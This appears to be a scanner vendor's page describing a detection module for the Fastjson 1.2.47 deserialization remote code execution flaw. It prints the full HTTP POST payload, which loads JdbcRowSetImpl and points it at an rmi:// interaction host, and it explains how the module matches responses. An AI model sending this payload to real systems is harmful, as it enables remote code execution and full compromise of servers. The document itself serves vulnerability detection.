Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
The "Fastjson 1.2.47 - Remote Code Execution" module is designed to detect a vulnerability in Fastjson 1.2.47, a Java library for JSON processing. This vulnerability allows for remote code execution through deserialization. The severity of this vulnerability is classified as critical, with a CVSS score of 10.
This module was authored by zh.
If successfully exploited, this vulnerability can allow an attacker to execute arbitrary code on the target system. This can lead to a complete compromise of the system, enabling unauthorized access, data theft, or further attacks.
The module sends an HTTP POST request to the target system with a specific payload that triggers the deserialization vulnerability. The payload includes a malicious object that exploits the vulnerability in Fastjson 1.2.47.
Here is an example of the payload:
POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/json
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://<InteractionURL>/Exploit",
"autoCommit":true
}
}
The module includes matching conditions to determine if the vulnerability is present. It checks for specific responses from the target system, such as a "Bad Request" or a status code of 400. Additionally, it verifies that the interaction protocol used is not DNS-based.
For more information, refer to the GitHub repository.